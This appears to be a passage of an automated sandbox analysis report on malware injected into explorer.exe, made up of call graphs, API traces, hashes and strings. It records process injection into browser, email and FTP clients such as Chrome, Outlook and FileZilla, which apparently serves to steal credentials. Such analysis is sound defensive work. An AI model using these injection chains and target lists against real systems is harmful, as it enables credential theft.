• Instruction Fuzzy Hash: 60F0E57021570A4FE7446FB8449C336B9E0FB88319F18563DE59AC22D0D7348842C702

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 251 e322b4-e322c6 252 e322d6-e322e6 251->252 253 e322c8-e322d0 CreateStreamOnHGlobal 251->253 253->252
                                                                                                                            APIs
                                                                                                                            • CreateStreamOnHGlobal.COMBASE ref: 00E322D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateGlobalStream
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2244384528-0
                                                                                                                            • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                            • Instruction ID: 2fdab92cff2978dd2fa3bf37450be161ca904b78e6585f53b5c2368efe5a0591
                                                                                                                            • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                            • Instruction Fuzzy Hash: 01E08C30108B0A8FD758AFBCE4CA07A37E1EB9C256B05053EE005CB124D27988C1C741

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 254 e3298c-e32997 255 e329b5 254->255 256 e32999-e3299c 254->256 258 e329b7-e329bc 255->258 256->255 257 e3299e-e329a7 GetFileAttributesW 256->257 259 e329b1-e329b3 257->259 260 e329a9-e329af 257->260 259->258 260->259
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE ref: 00E3299E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                            • Instruction ID: 0f0d09ba80901e204d7ceb368e3fc0a9d92f68d263a326e34bcb385e38eac0ee
                                                                                                                            • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                            • Instruction Fuzzy Hash: 3CD05E32612905076B6426F908DD3B128A0D75932EF14222EEB76D12A0E297C895E201

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 261 e31860-e31870 call e31ad4 264 e31872-e31880 RtlFreeHeap 261->264 265 e31886-e3188b 261->265 264->265
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                            • Instruction ID: 92f917ca4533791b49ca91bf84afc6238d37f23deafcd8317c1521849b46e917
                                                                                                                            • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                            • Instruction Fuzzy Hash: C1D01224716A080BEF2CBBFA1C8D174BED2E758216F1890A9B819D3251DD39C895C345

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                            Signature Coverage:17.3%
                                                                                                                            Total number of Nodes:306
                                                                                                                            Total number of Limit Nodes:42
                                                                                                                            execution_graph 708 2f01000 709 2f01010 708->709 710 2f01007 708->710 712 2f01016 710->712 762 2f02608 VirtualQuery 712->762 715 2f01097 715->709 717 2f0102c RtlMoveMemory 718 2f01071 GetCurrentProcessId 717->718 719 2f0104d 717->719 723 2f01092 718->723 724 2f0109e 718->724 799 2f02861 GetProcessHeap RtlAllocateHeap 719->799 721 2f01052 RtlMoveMemory 721->718 723->715 726 2f01095 723->726 765 2f010a4 724->765 800 2f01332 726->800 727 2f010a3 729 2f02861 GetProcessHeap RtlAllocateHeap 727->729 730 2f010cc 729->730 731 2f010dc CreateToolhelp32Snapshot 730->731 732 2f010f0 Process32First 731->732 733 2f01322 Sleep 731->733 734 2f0131b CloseHandle 732->734 735 2f0110c lstrcmpiA 732->735 733->731 734->733 736 2f01124 lstrcmpiA 735->736 748 2f01280 735->748 737 2f01138 lstrcmpiA 736->737 736->748 739 2f0114c lstrcmpiA 737->739 737->748 738 2f025ad OpenProcess IsWow64Process IsWow64Process CloseHandle 738->748 740 2f01160 lstrcmpiA 739->740 739->748 742 2f01170 lstrcmpiA 740->742 740->748 741 2f01305 Process32Next 741->735 743 2f01319 741->743 744 2f01184 lstrcmpiA 742->744 742->748 743->734 745 2f01198 lstrcmpiA 744->745 744->748 746 2f011ac lstrcmpiA 745->746 745->748 747 2f011c0 lstrcmpiA 746->747 746->748 747->748 749 2f011d4 lstrcmpiA 747->749 748->738 748->741 750 2f02608 VirtualQuery 748->750 754 2f012ae lstrcmpiA 748->754 758 2f01819 30 API calls 748->758 749->748 751 2f011e8 lstrcmpiA 749->751 750->748 751->748 752 2f011fc lstrcmpiA 751->752 752->748 753 2f0120c lstrcmpiA 752->753 753->748 755 2f0121c lstrcmpiA 753->755 754->748 755->748 756 2f0122c lstrcmpiA 755->756 756->748 757 2f0123c lstrcmpiA 756->757 757->748 759 2f0124c lstrcmpiA 757->759 758->748 759->748 760 2f0125c lstrcmpiA 759->760 760->748 761 2f0126c lstrcmpiA 760->761 761->741 761->748 763 2f0101e 762->763 763->715 764 2f02861 GetProcessHeap RtlAllocateHeap 763->764 764->717 827 2f02861 GetProcessHeap RtlAllocateHeap 765->827 767 2f010cc 768 2f010dc CreateToolhelp32Snapshot 767->768 769 2f010f0 Process32First 768->769 770 2f01322 Sleep 768->770 771 2f0131b CloseHandle 769->771 772 2f0110c lstrcmpiA 769->772 770->768 771->770 773 2f01280 772->773 774 2f01124 lstrcmpiA 772->774 779 2f01305 Process32Next 773->779 787 2f02608 VirtualQuery 773->787 791 2f012ae lstrcmpiA 773->791 828 2f025ad OpenProcess 773->828 834 2f01819 773->834 774->773 775 2f01138 lstrcmpiA 774->775 775->773 777 2f0114c lstrcmpiA 775->777 777->773 778 2f01160 lstrcmpiA 777->778 778->773 780 2f01170 lstrcmpiA 778->780 779->772 781 2f01319 779->781 780->773 782 2f01184 lstrcmpiA 780->782 781->771 782->773 783 2f01198 lstrcmpiA 782->783 783->773 784 2f011ac lstrcmpiA 783->784 784->773 785 2f011c0 lstrcmpiA 784->785 785->773 786 2f011d4 lstrcmpiA 785->786 786->773 788 2f011e8 lstrcmpiA 786->788 787->773 788->773 789 2f011fc lstrcmpiA 788->789 789->773 790 2f0120c lstrcmpiA 789->790 790->773 792 2f0121c lstrcmpiA 790->792 791->773 792->773 793 2f0122c lstrcmpiA 792->793 793->773 794 2f0123c lstrcmpiA 793->794 794->773 796 2f0124c lstrcmpiA 794->796 796->773 797 2f0125c lstrcmpiA 796->797 797->773 798 2f0126c lstrcmpiA 797->798 798->773 798->779 799->721 880 2f02861 GetProcessHeap RtlAllocateHeap 800->880 802 2f01340 GetModuleFileNameA 881 2f02861 GetProcessHeap RtlAllocateHeap 802->881 804 2f01357 GetCurrentProcessId wsprintfA 882 2f0263e CryptAcquireContextA 804->882 807 2f0139c Sleep 887 2f024d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 807->887 808 2f0140d 905 2f02843 808->905 811 2f013ae GetModuleHandleA GetProcAddress 813 2f013c9 811->813 814 2f013da GetModuleHandleA GetProcAddress 811->814 895 2f01de3 813->895 817 2f013f5 814->817 818 2f01406 814->818 815 2f02843 3 API calls 819 2f0141b RtlExitUserThread 815->819 820 2f01de3 3 API calls 817->820 821 2f024d5 10 API calls 818->821 822 2f01425 819->822 820->818 821->808 823 2f0144b 822->823 824 2f02608 VirtualQuery 822->824 823->724 825 2f0143a 824->825 825->823 910 2f01493 825->910 827->767 829 2f02600 828->829 830 2f025cb IsWow64Process 828->830 829->773 831 2f025ee 830->831 832 2f025dc IsWow64Process 830->832 833 2f025f9 CloseHandle 831->833 832->831 832->833 833->829 835 2f02608 VirtualQuery 834->835 836 2f01833 835->836 837 2f01845 OpenProcess 836->837 838 2f01a76 836->838 837->838 839 2f0185e 837->839 838->773 840 2f02608 VirtualQuery 839->840 841 2f01865 840->841 841->838 842 2f01873 NtSetInformationProcess 841->842 843 2f0188f 841->843 842->843 865 2f01a80 843->865 846 2f01a80 2 API calls 847 2f018d6 846->847 848 2f01a73 CloseHandle 847->848 849 2f01a80 2 API calls 847->849 848->838 850 2f01900 849->850 871 2f01b17 850->871 853 2f01a80 2 API calls 854 2f01930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 853->854 855 2f01a4e CreateRemoteThread 854->855 858 2f01985 854->858 857 2f01a65 CloseHandle 855->857 856 2f0198b CreateMutexA GetLastError 856->858 859 2f019a7 CloseHandle Sleep 856->859 860 2f01a67 CloseHandle CloseHandle 857->860 858->856 861 2f019bb GetModuleHandleA GetProcAddress ReadProcessMemory 858->861 859->856 860->848 862 2f01a47 861->862 863 2f019ec WriteProcessMemory 861->863 862->857 862->860 863->862 864 2f01a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 863->864 864->862 866 2f01a94 865->866 867 2f018b4 865->867 868 2f01aa4 NtCreateSection 866->868 869 2f01ac3 866->869 867->846 868->869 869->867 870 2f01ad8 NtMapViewOfSection 869->870 870->867 872 2f01b2e 871->872 878 2f01b60 871->878 873 2f01b30 RtlMoveMemory 872->873 873->873 873->878 874 2f01bc3 875 2f01910 NtUnmapViewOfSection 874->875 877 2f01be1 LdrProcessRelocationBlock 874->877 875->853 876 2f01b71 LoadLibraryA 876->875 876->878 877->874 877->875 878->874 878->876 879 2f01ba1 GetProcAddress 878->879 879->875 879->878 880->802 881->804 883 2f02664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 882->883 884 2f01384 CreateMutexA GetLastError 882->884 885 2f026aa wsprintfA 883->885 884->807 884->808 885->885 886 2f026cc CryptDestroyHash CryptReleaseContext 885->886 886->884 888 2f02515 887->888 889 2f02565 CloseHandle 888->889 890 2f02555 Thread32Next 888->890 891 2f02521 OpenThread 888->891 889->811 890->888 892 2f02544 ResumeThread 891->892 893 2f0253c SuspendThread 891->893 894 2f0254a CloseHandle 892->894 893->894 894->890 896 2f01ded 895->896 904 2f01e56 895->904 896->904 937 2f01e93 VirtualProtect 896->937 898 2f01e04 898->904 938 2f02815 VirtualAlloc 898->938 900 2f01e10 901 2f01e1a RtlMoveMemory 900->901 902 2f01e2d 900->902 901->902 939 2f01e93 VirtualProtect 902->939 904->814 906 2f02608 VirtualQuery 905->906 907 2f0284b 906->907 908 2f01414 907->908 909 2f0284f GetProcessHeap HeapFree 907->909 908->815 909->908 911 2f014c0 910->911 912 2f014a1 910->912 914 2f01510 911->914 915 2f014c8 911->915 940 2f017c7 912->940 959 2f026e6 lstrlen lstrlen 914->959 918 2f017c7 5 API calls 915->918 933 2f014b6 915->933 920 2f014e0 918->920 919 2f0155f 921 2f026e6 2 API calls 919->921 920->933 947 2f01647 920->947 923 2f0156c 921->923 926 2f015a0 923->926 927 2f01584 923->927 923->933 924 2f01532 961 2f01752 GetModuleHandleA GetProcAddress 924->961 931 2f02404 5 API calls 926->931 926->933 964 2f02404 lstrlen 927->964 934 2f015ac 931->934 932 2f01647 11 API calls 932->933 933->823 934->933 935 2f01647 11 API calls 934->935 936 2f014fb 935->936 936->933 970 2f015e0 936->970 937->898 938->900 939->904 941 2f01812 940->941 942 2f017d1 940->942 941->933 942->941 943 2f026e6 2 API calls 942->943 944 2f017f1 943->944 944->941 975 2f02861 GetProcessHeap RtlAllocateHeap 944->975 946 2f01804 RtlMoveMemory 946->941 948 2f01660 947->948 949 2f01745 947->949 948->949 950 2f01671 lstrlen 948->950 949->936 950->949 951 2f01683 lstrlen 950->951 951->949 952 2f01690 getpeername 951->952 952->949 953 2f016ae inet_ntoa htons 952->953 953->949 954 2f016cc 953->954 954->949 976 2f02861 GetProcessHeap RtlAllocateHeap 954->976 956 2f01717 wsprintfA 957 2f0173a 956->957 957->949 958 2f02843 3 API calls 957->958 958->949 960 2f0151d 959->960 960->919 960->924 962 2f01539 961->962 963 2f01776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 961->963 962->932 962->933 963->962 965 2f02456 964->965 966 2f0241c CryptStringToBinaryA 964->966 965->933 966->965 967 2f02438 966->967 977 2f02861 GetProcessHeap RtlAllocateHeap 967->977 969 2f02444 CryptStringToBinaryA 969->965 971 2f02843 3 API calls 970->971 972 2f015f5 971->972 973 2f02843 3 API calls 972->973 974 2f015fc 973->974 974->933 975->946 976->956 977->969 987 2f01425 988 2f01432 987->988 989 2f0144b 987->989 990 2f02608 VirtualQuery 988->990 991 2f0143a 990->991 991->989 992 2f01493 23 API calls 991->992 992->989 993 2f01eb6 994 2f01ed9 993->994 995 2f01ecc lstrlen 993->995 1004 2f02861 GetProcessHeap RtlAllocateHeap 994->1004 995->994 997 2f01ee1 lstrcat 998 2f01f16 lstrcat 997->998 999 2f01f1d 997->999 998->999 1005 2f01f4a 999->1005 1002 2f02843 3 API calls 1003 2f01f40 1002->1003 1004->997 1039 2f022b8 1005->1039 1009 2f01f77 1044 2f027e2 lstrlen MultiByteToWideChar 1009->1044 1011 2f01f86 1045 2f02374 RtlZeroMemory 1011->1045 1014 2f01fd8 RtlZeroMemory 1016 2f0200d 1014->1016 1015 2f02843 3 API calls 1017 2f01f2d 1015->1017 1018 2f0229a 1016->1018 1022 2f0203b 1016->1022 1047 2f022e5 1016->1047 1017->1002 1018->1015 1020 2f02280 1020->1018 1021 2f02843 3 API calls 1020->1021 1021->1018 1022->1020 1056 2f02861 GetProcessHeap RtlAllocateHeap 1022->1056 1024 2f0210b wsprintfW 1025 2f02131 1024->1025 1029 2f0219e 1025->1029 1057 2f02861 GetProcessHeap RtlAllocateHeap 1025->1057 1027 2f0216b wsprintfW 1027->1029 1028 2f0225d 1030 2f02843 3 API calls 1028->1030 1029->1028 1058 2f02861 GetProcessHeap RtlAllocateHeap 1029->1058 1032 2f02271 1030->1032 1032->1020 1033 2f02843 3 API calls 1032->1033 1033->1020 1034 2f02256 1037 2f02843 3 API calls 1034->1037 1035 2f021e9 1035->1034 1059 2f02815 VirtualAlloc 1035->1059 1037->1028 1038 2f02243 RtlMoveMemory 1038->1034 1040 2f01f69 1039->1040 1041 2f022c2 1039->1041 1043 2f02861 GetProcessHeap RtlAllocateHeap 1040->1043 1042 2f026e6 2 API calls 1041->1042 1042->1040 1043->1009 1044->1011 1046 2f01f96 1045->1046 1046->1014 1046->1018 1048 2f02353 1047->1048 1050 2f022f2 1047->1050 1048->1022 1049 2f022f6 DnsQuery_W 1049->1050 1050->1048 1050->1049 1051 2f02335 DnsFree inet_ntoa 1050->1051 1051->1050 1052 2f02355 1051->1052 1060 2f02861 GetProcessHeap RtlAllocateHeap 1052->1060 1054 2f0235f 1061 2f027e2 lstrlen MultiByteToWideChar 1054->1061 1056->1024 1057->1027 1058->1035 1059->1038 1060->1054 1061->1048 1062 2f02806 VirtualFree 978 2f07728 979 2f07904 978->979 980 2f0774b 978->980 979->979 981 2f0785a LoadLibraryA 980->981 985 2f0789f VirtualProtect VirtualProtect 980->985 982 2f07871 981->982 982->980 984 2f07883 GetProcAddress 982->984 984->982 986 2f07899 984->986 985->979 1069 2f0245e lstrlen 1070 2f024a5 1069->1070 1071 2f02476 CryptBinaryToStringA 1069->1071 1071->1070 1072 2f02489 1071->1072 1075 2f02861 GetProcessHeap RtlAllocateHeap 1072->1075 1074 2f02494 CryptBinaryToStringA 1074->1070 1075->1074

                                                                                                                            Callgraph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            • Opacity -> Relevance
                                                                                                                            • Disassembly available
                                                                                                                            callgraph 0 Function_02F02731 1 Function_02F01332 6 Function_02F0263E 1->6 9 Function_02F02861 1->9 11 Function_02F01DE3 1->11 22 Function_02F01493 1->22 24 Function_02F024D5 1->24 37 Function_02F02843 1->37 42 Function_02F02608 1->42 2 Function_02F02573 3 Function_02F02374 4 Function_02F01EB6 4->9 4->37 43 Function_02F01F4A 4->43 5 Function_02F022B8 15 Function_02F026E6 5->15 7 Function_02F0283F 8 Function_02F015E0 8->37 10 Function_02F027E2 23 Function_02F01E93 11->23 25 Function_02F02815 11->25 31 Function_02F01E5D 11->31 34 Function_02F01DC0 11->34 12 Function_02F010A4 12->0 12->2 12->9 18 Function_02F025AD 12->18 20 Function_02F02592 12->20 29 Function_02F01819 12->29 12->42 13 Function_02F01425 13->22 13->42 14 Function_02F022E5 14->9 14->10 16 Function_02F07728 17 Function_02F01469 17->22 17->42 19 Function_02F024AE 21 Function_02F01752 22->8 22->15 22->21 38 Function_02F02404 22->38 40 Function_02F01647 22->40 41 Function_02F017C7 22->41 26 Function_02F01016 26->0 26->1 26->2 26->9 26->12 26->18 26->20 26->29 26->42 27 Function_02F01B17 28 Function_02F03417 29->27 33 Function_02F01A80 29->33 29->42 30 Function_02F01C19 35 Function_02F01D80 31->35 32 Function_02F0245E 32->9 34->30 35->30 36 Function_02F01000 36->26 37->42 38->9 39 Function_02F02806 40->9 40->19 40->37 41->9 41->15 43->0 43->3 43->5 43->9 43->10 43->14 43->25 43->37

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 2f01016-2f01020 call 2f02608 3 2f01022-2f0104b call 2f02861 RtlMoveMemory 0->3 4 2f01097-2f01098 0->4 7 2f01071-2f01090 GetCurrentProcessId 3->7 8 2f0104d-2f0106b call 2f02861 RtlMoveMemory 3->8 12 2f01092-2f01093 7->12 13 2f0109e-2f010d7 call 2f010a4 call 2f02861 7->13 8->7 12->4 15 2f01095-2f01099 call 2f01332 12->15 22 2f010dc-2f010ea CreateToolhelp32Snapshot 13->22 15->13 23 2f010f0-2f01106 Process32First 22->23 24 2f01322-2f0132d Sleep 22->24 25 2f0131b-2f0131c CloseHandle 23->25 26 2f0110c-2f0111e lstrcmpiA 23->26 24->22 25->24 27 2f01280-2f01289 call 2f025ad 26->27 28 2f01124-2f01132 lstrcmpiA 26->28 34 2f01305-2f01313 Process32Next 27->34 35 2f0128b-2f01294 call 2f02592 27->35 28->27 29 2f01138-2f01146 lstrcmpiA 28->29 29->27 31 2f0114c-2f0115a lstrcmpiA 29->31 31->27 33 2f01160-2f0116a lstrcmpiA 31->33 33->27 36 2f01170-2f0117e lstrcmpiA 33->36 34->26 37 2f01319 34->37 35->34 42 2f01296-2f0129d call 2f02573 35->42 36->27 39 2f01184-2f01192 lstrcmpiA 36->39 37->25 39->27 41 2f01198-2f011a6 lstrcmpiA 39->41 41->27 43 2f011ac-2f011ba lstrcmpiA 41->43 42->34 47 2f0129f-2f012ac call 2f02608 42->47 43->27 45 2f011c0-2f011ce lstrcmpiA 43->45 45->27 48 2f011d4-2f011e2 lstrcmpiA 45->48 47->34 54 2f012ae-2f01300 lstrcmpiA call 2f02731 call 2f01819 call 2f02731 47->54 48->27 50 2f011e8-2f011f6 lstrcmpiA 48->50 50->27 52 2f011fc-2f0120a lstrcmpiA 50->52 52->27 53 2f0120c-2f0121a lstrcmpiA 52->53 53->27 55 2f0121c-2f0122a lstrcmpiA 53->55 54->34 55->27 57 2f0122c-2f0123a lstrcmpiA 55->57 57->27 59 2f0123c-2f0124a lstrcmpiA 57->59 59->27 61 2f0124c-2f0125a lstrcmpiA 59->61 61->27 63 2f0125c-2f0126a lstrcmpiA 61->63 63->27 65 2f0126c-2f0127a lstrcmpiA 63->65 65->27 65->34
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02F02608: VirtualQuery.KERNEL32(02F04434,?,0000001C), ref: 02F02615
                                                                                                                              • Part of subcall function 02F02861: GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
                                                                                                                              • Part of subcall function 02F02861: RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02F01038
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02F0106B
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02F01074
                                                                                                                            • GetCurrentProcessId.KERNEL32(?,02F01010), ref: 02F0107A
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F010DF
                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02F010FE
                                                                                                                            • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02F0111A
                                                                                                                            • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02F0112E
                                                                                                                            • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02F01142
                                                                                                                            • lstrcmpiA.KERNEL32(?,opera.exe), ref: 02F01156
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F01166
                                                                                                                            • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02F0117A
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 02F0118E
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 02F011A2
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 02F011B6
                                                                                                                            • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 02F011CA
                                                                                                                            • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 02F011DE
                                                                                                                            • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 02F011F2
                                                                                                                            • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02F01206
                                                                                                                            • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02F01216
                                                                                                                            • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02F01226
                                                                                                                            • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02F01236
                                                                                                                            • lstrcmpiA.KERNEL32(?,263em.exe), ref: 02F01246
                                                                                                                            • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02F01256
                                                                                                                            • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02F01266
                                                                                                                            • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02F01276
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F012B4
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02F0130B
                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 02F0131C
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 02F01327
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                            • String ID: 0-8wP,8w$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                            • API String ID: 2555639992-1022288460
                                                                                                                            • Opcode ID: f95afa416cc2f1d5b89333d47d40b7401d0b70ba04958a47227f498277f66d95
                                                                                                                            • Instruction ID: 49d546cd9ab95504193127289be062a997a6ff9f65ed47780dfeda650809bfc5
                                                                                                                            • Opcode Fuzzy Hash: f95afa416cc2f1d5b89333d47d40b7401d0b70ba04958a47227f498277f66d95
                                                                                                                            • Instruction Fuzzy Hash: B2719230E41309ABEB10DBB19DC8E6BBBACBB497C4B040969FF45D20C4DB60D509AF64

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02F02861: GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
                                                                                                                              • Part of subcall function 02F02861: RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F010DF
                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02F010FE
                                                                                                                            • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02F0111A
                                                                                                                            • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02F0112E
                                                                                                                            • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02F01142
                                                                                                                            • lstrcmpiA.KERNEL32(?,opera.exe), ref: 02F01156
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F01166
                                                                                                                            • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02F0117A
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 02F0118E
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 02F011A2
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 02F011B6
                                                                                                                            • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 02F011CA
                                                                                                                            • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 02F011DE
                                                                                                                            • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 02F011F2
                                                                                                                            • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02F01206
                                                                                                                            • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02F01216
                                                                                                                            • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02F01226
                                                                                                                            • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02F01236
                                                                                                                            • lstrcmpiA.KERNEL32(?,263em.exe), ref: 02F01246
                                                                                                                            • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02F01256
                                                                                                                            • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02F01266
                                                                                                                            • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02F01276
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F012B4
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02F0130B
                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 02F0131C
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 02F01327
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                            • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                            • API String ID: 3950187957-1680033604
                                                                                                                            • Opcode ID: 8b1bd82951850362ebd7952a4ce6b2470bff6528153a2babdc2fb09c3216ee6c
                                                                                                                            • Instruction ID: 22ac626dab0b549fbd685e48ad94cb1394e1141af468d2b82091c8fe7708aee2
                                                                                                                            • Opcode Fuzzy Hash: 8b1bd82951850362ebd7952a4ce6b2470bff6528153a2babdc2fb09c3216ee6c
                                                                                                                            • Instruction Fuzzy Hash: 41517230E05309A6EB10DBB18DC4E6F7BEC6E89BC4B040929FB45C20C4EB64E509AF75

                                                                                                                            Control-flow Graph

                                                                                                                             • Graph image not captured; 55 basic blocks spanning 2f07728-2f0790d, calling LoadLibraryA, GetProcAddress and VirtualProtect (x2)
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F06000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F06000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f06000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d61328d9644783f32f0c46b7311b119f47afcf68d8a47ee6a31c313ac0ba99db
